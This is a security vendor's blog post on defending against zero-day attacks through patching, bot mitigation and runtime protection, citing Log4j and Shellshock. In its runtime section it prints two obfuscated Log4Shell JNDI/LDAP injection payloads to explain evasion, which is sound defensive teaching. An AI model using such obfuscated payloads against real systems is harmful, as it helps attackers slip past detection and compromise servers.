Defending Against Zero-Day Threats

PUBLISHED ON August 11, 2023
LAST UPDATED April 2, 2024

With the dynamic and complex nature of today’s technology landscape, zero-day threats are a significant and growing problem. Testing for vulnerabilities, keeping on top of vulnerability disclosures, identifying known vulnerabilities, and patching vulnerabilities is an epic and ongoing challenge. Layers of security, including at runtime, are essential.

Get details on protecting against runtime threats to APIs and applications.

What Is a Zero-Day Attack?

A zero-day vulnerability is a flaw the software creator has not identified yet. A zero-day attack exploits a zero-day vulnerability, leaving the software vendor “zero days” to issue a fix before the vulnerability it is exploited.

This is a clever description from an article in G2:

“Imagine you accidentally leave a rarely used window open in your home.

You don’t think anything of it until you notice things going missing. Thieves have been sneaking in and out of your house for days, availing themselves of your stuff using that neglected window. 

Zero-day attacks are exactly the same. Hackers find and exploit a vulnerability in your system before you know it exists. And until you find the bug, you can’t fix the problem.”

Notable named zero-day attacks include Heartbleed and Shellshock in 2014, WannaCry in 2017, and log4j in 2021.

What’s the extent of the zero-day problem? A recent Mandiant study found there were 55 exploited zero-day vulnerabilities in 2022. They found 81 exploited zero-days exploited in 2021.

Time Is Not On Your Side

Time is of the essence in addressing zero-day exploits – and it’s almost impossible to keep up with the attackers on this front.

This year’s Verizon Data Breach Investigations Report included an analysis of Log4j, the dangerous zero-day vulnerability disclosed in late 2021. The report found that more than 32 percent of all Log4j scanning activity over the course of the year happened within 30 days of its release. This tells us that attackers act fast and often when a vulnerability is disclosed.

The report also points out that “this velocity is an interesting comparison versus organizations’ median time to patch, which is currently 49 days for critical vulnerabilities, a number that has stayed relatively consistent over the years.”

In addition, security company Checkpoint found that there were a whopping 830,000 attack attempts made within 72 hours of revealing the Log4j vulnerability.

Finally, attackers quickly spinning up variants of zero-day vulnerabilities complicates the problem. For instance, there were a flood of log4j variants in the hours and days after its release. This trend is making it increasingly difficult for security teams to keep up and mitigate zero-day attacks.

Best Practices for Addressing Zero-Day Vulnerabilities

Attackers have all the time in the world to hunt for vulnerabilities, and they move with lightning speed with they find one. There is no one perfect defense, but layers of defense make a big difference. Critical in these layers are patching, bot mitigation, and runtime protection.

Patching problems

Patching is key to addressing zero-day vulnerabilities, but also remains a struggle.

It’s best practice to establish a robust patch management policy and process, including
regular vulnerability scanning and prioritization of critical patches. Also, ensure that all systems and software are properly configured to receive and apply patches automatically, where and when possible. Training and education for staff on patch management best practices and the importance of timely patching is also critically important.

Finally, organizations should regularly review and update their patch management strategy to ensure that it remains effective in the face of evolving threats and technologies.

All this is easier said than done. During a one-month period earlier this year, ThreatX
identified attackers attempting to exploit a Shellshock vulnerability in approximately one-third of our customers. Keep in mind that this is a vulnerability that was disclosed nine years ago.

Why do so many struggle with these best practices? First, the process can be complex and time-consuming, especially in large or distributed environments. Second, there may be concerns about the potential impact of applying patches, such as downtime or compatibility issues with other software. Finally, some organizations may not have the necessary resources or expertise to effectively manage patching across their entire infrastructure.

Role of bots 

Bots play a central role in zero-day exploitation, making bot mitigation a critical part of addressing zero days. Criminals usually scan for systems that are vulnerable to zero-day vulnerabilities using bots, then also use bots to carry out attacks. 

Learn more about the role of bots in API attacks.

Keep in mind that coarse-grained bot mitigation efforts can disrupt or degrade legitimate user experience. It’s long been known that the use of CAPTCHA to identify humans vs. bots leads to a sub-optimal customer experience. Advanced bots may also use headless browsers or impersonate legitimate users, which can easily defeat user-agent based detection and fool WAFs and web applications into thinking the attacking bots are, in fact, a normal human user. 

Real-time behavioral profiling and threat engagement techniques are critical to effective bot mitigation. Behavioral profiling looks at large volumes of contextual data, monitoring every request live from every user to characterize their behavior and map their intent. By seeing more transactions, the system can recognize a broader pattern much faster and automatically craft a complex behavioral signature to block the attack in real time. In addition to behavioral profiling, advanced threat engagement techniques, such as IP fingerprinting, interrogation, and tarpitting, help shed light on the “user’s” intent. 

Get details on behavioral profiling.

Runtime protection

Protecting running applications and APIs is an important part of a layered defense against zero-day vulnerabilities, because it blocks attacks while giving teams time to address vulnerabilities – without trying to keep up with attackers jumping on vulnerabilities or spinning up variants at a lightning-fast pace.   

For instance, as security engineers responded to Log4j attacks and deployed patches for multiple and quickly emerging attack variants in late 2021, the limitations of only observing HTTP request and response pairs became obvious.  

While the HTTP requests provided a lot of information, it took security engineers longer than they wanted to understand what attackers were targeting, what techniques they were using, and how they were going about it.  

For example, the following two payloads are the same, but each uses different obfuscation techniques.  

If only looking at HTTP requests, you’d have to recognize the obfuscation to figure out what the attackers are trying to do.  

Payload 1:  

${${::-j}${::-n}${::-d}${::-i}: ${::-l}${::-d}${::-a}${::-p}: //}  

Payload 2:  

${${lower:j}ndi:${lower:l} ${lower:d}a${lower:p}: //}  

The goal of the payloads is to use “jndi”, “:” and “ldap” because the vulnerability is related to a command that contained: “jndi:ldap”. In the first example, they are using “::-” with each letter to hide things. In the second example, they are using a function called “lower” to hide things.  

The Log4j vulnerability had many variations like this. Even just with the examples above, you could mix and match with {::-j}${lower:n} etc.  

However, on the runtime side, both previous payloads do the same thing. So, if you are identifying and blocking at runtime, you would stop the threat immediately, no matter how much attackers try to disguise the intent.  

Defense in Depth

There is no zero-day silver bullet (sadly). But with a thoughtful, layered approach, teams can build a zero-day defense that provides effective protection without excessive whack-a-mole. 

Learn more about protecting against runtime threats to APIs and applications. 


About the Author

Jeremy Ventura

Jeremy Ventura is a cybersecurity professional, specializing in advising organizations on information security best practices. He has years of experience in vulnerability management, email security, incident response and security center operations. At ThreatX, he is responsible for the development and presentation of thought leadership across all areas of cybersecurity. Ventura is an industry leader that can regularly be seen in media, blog posts, podcasts and at speaking events. Previously, Ventura has worked at Gong, Mimecast, Tenable and IBM, among other security organizations. Ventura holds a Master’s Degree in Cybersecurity and Homeland Security.